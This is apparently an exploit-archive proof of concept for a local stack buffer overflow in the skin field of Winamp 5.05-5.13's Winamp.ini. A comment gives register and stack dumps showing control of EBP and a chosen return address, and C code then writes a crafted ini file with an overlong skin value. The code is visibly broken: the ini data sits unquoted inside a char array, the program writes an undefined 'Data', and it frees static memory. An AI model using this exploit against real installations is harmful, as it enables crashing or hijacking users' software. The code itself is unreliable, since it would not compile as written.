Winamp versions 5.05 through 5.13 .ini local stack buffer overflow proof of concept exploit.
e5862cc513ec580a652b913188b7b7c0f4287a97d191bfbe1ada137d8251baf2
/*Winamp 5.05-5.13 .ini local stack buffer overflow poc
The problem is in the skin field when a long string is
writen it causes the buffer overflow.
All u have to do is replace this file with the initial one.
-snipp--
[Winamp]
visplugin_name=vis_avs.dll
visplugin_num=0
mw_open=1
outname=out_ds.dll
proxyonly80=0
Proxy=
inet_mode=0
langpack=
skin=long string
-snipp--
Registers
EAX 001E0A17
ECX 00008E3E
EDX 7C90EB94 ntdll.KiFastSystemCallRet
EBX 004C0304 winamp.004C0304
ESP 0012965C ASCII "edit.txt"
EBP 41414141 ->controled
ESI 77D5355A USER32.GetSubMenu
EDI 00009D85
EIP 6C705C41
Stack:
0012914A 41414141
0012914E 41414141
00129152 41414141
00129156 41414141
0012915A 41414141
0012915E 41414141
00129162 41414141
....................
77F30A7A 5D POP EBP
77F30A7B C3 RETN
"\x7A\x0A\xF3\x77"
*/
#include<stdio.h>
#include<string.h>
#define Fil3 "Winamp.ini"
char data[]=
{
[Winamp]
visplugin_name=vis_avs.dll
visplugin_num=0
mw_open=1
outname=out_ds.dll
proxyonly80=0
Proxy=
inet_mode=0
langpack=
skin=AAAAAAAAAAAAAAAAAAAABBBBBBBBBBrQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2dREbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoaMeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH8S4kwIgTxSl1C00GOzOLMrbAyfKUUT2222Rblsaqv6UpdvNIsNr
defext=mp3
titlefmt=[%artist% - ]$if2(%title%,$filepart(%filename%))
dspplugin_name=
check_ft_startup=1
pe_fontsize=11
visplugin_priority=2
visplugin_autoexec=0
dspplugin_num=0
sticon=0
splash=0
taskbar=0
dropaotfs=1
ascb_new=1
ttips=1
riol=0
minst=0
whichicon=1
whichicon2=1
addtolist=0
snap=1
snaplen=10
parent=1
hilite=1
disvis=1
rofiob=0
shownumsinpl=1
keeponscreen=1
eqdsize=1
usecursors=1
fixtitles=3
priority=1
shuffle_morph_rate=50
useexttitles=1
bifont=0
ospb=0
embedwnd_freesize=0
no_visseh=0
newverchk=11413
newverchk2=0
last_shortdesc=
last_shorturl=
prefs_last_page=552
autoload_eq=0
use_eq=1
eq_ws=0
wx=26
wy=29
minimized=0
aot=0
shuffle=0
repeat=1
volume=82
pan=0
easymove=1
dsize=0
timeleftmode=0
autoscrollname=1
sa=1
safire=4
saref=2
safalloff=2
sa_peaks=1
sa_peak_falloff=1
eq_wx=26
eq_wy=145
eq_open=1
pe_wx=26
pe_wy=261
pe_open=1
pe_width=275
pe_height=145
pe_height_ws=
mb_wx=301
mb_wy=29
mb_open=0
mb_width=350
mb_height=348
video_wx=26
video_wy=145
video_open=0
video_width=275
video_height=232
video_ratio1=4
video_ratio2=3
video_useratio=0
windowshade=0
preamp=31
pilp=0
randskin=0
cwd=G:\Program Files\Winamp
pladv=1
eq_data=32,22,31,41,40,31,19,16,16,17
video_vsync=0
video_aspectadj=1
video_overlays=1
video_ddraw=1
video_updsize=1
video_autoopen=1
video_autoclose=1
video_noss=1
video_osd=1
video_yv12=1
video_stopclose=1
video_remove_fs_on_stop=0
wav_do_header=1
wav_convert=0
wav_ext=WAV
playlist_custom_font=Arial
custom_plfont=0
[WAV Writing Output Driver]
config_waveoutdir=c:\
cfg_cvt=
cfg_wav1=
cfg_wav1p=c:\out.wav
cfg_mode=
cfg_thread=
cfg_killsilence=
cfg_wfx_s=18
cfg_wfx=0100020044AC000010B10200040010000000CA
cfg_wfx1=0100020044AC000010B10200040010000000CA
[gen_ff]
classicplws=0
classicplwidth=275
classicplheight=145
classicmw=1
classiceq=1
[out_ds]
cfg_total_time=54A15F08000000005C
[AVS]
smp=0
smp_mt=2
wx=32
wy=32
ww=300
wh=232
config_pres_subdir=
cfg_docked=0
cfg_cfgwnd_open=0
cfg_cfgwnd_x=50
cfg_cfgwnd_y=50
cfg_fs_w=0
cfg_fs_h=0
cfg_fs_d=2
cfg_fs_bpp=0
cfg_fs_fps=6
cfg_fs_rnd=1
cfg_fs_rnd_time=10
cfg_fs_dblclk=1
cfg_fs_flip=0
cfg_fs_height=80
cfg_fs_use_overlay=0
cfg_fs_cancelondeactivate=1
cfg_speed=5
cfg_trans=0
cfg_dont_min_avs=0
cfg_smartbeat=0
cfg_smartbeatsticky=1
cfg_smartbeatresetnewsong=1
cfg_smartbeatonlysticky=0
cfg_transitions_en=4
cfg_transitions_preinit=36
cfg_transitions_speed=8
cfg_transitions_mode=32769
cfg_bkgnd_render=0
cfg_bkgnd_render_color=2031631
cfg_render_prio=0
g_preset_dirty=0
cfg_prompt_save_preset=1
last_preset_name=
cfg_reuseonresize=1
cfg_log_errors=0
cfg_reset_vars=1
cfg_seh=1
debugreg_0=0
debugreg_1=1
debugreg_2=2
debugreg_3=3
debugreg_4=4
debugreg_5=5
debugreg_6=6
debugreg_7=7
};
char header[]=
{
"*******************************************************\n"
" Winamp 5.05-5.13 .ini local stack buffer overflow poc\n"
" by fl0 fl0w \n"
"*******************************************************\n"
};
/*----------prototypes---------*/
int fmake(char*);
void print(char*);
/*-----main-----------*/
int main()
{
printf("%s",header);
fmake(Fil3);
getchar();
return 0;
}
int fmake(char* fname)
{
FILE *f=fopen(fname,"wb");
if(f==NULL)
{
print("File eror");
exit(0);
}
fprintf(f,"%s",Data);
fclose(f); free(Data);
print("Winamp.ini file Done!");
return 0;
}
void print(char* msg)
{
printf("\n[*]%s\n",msg);
}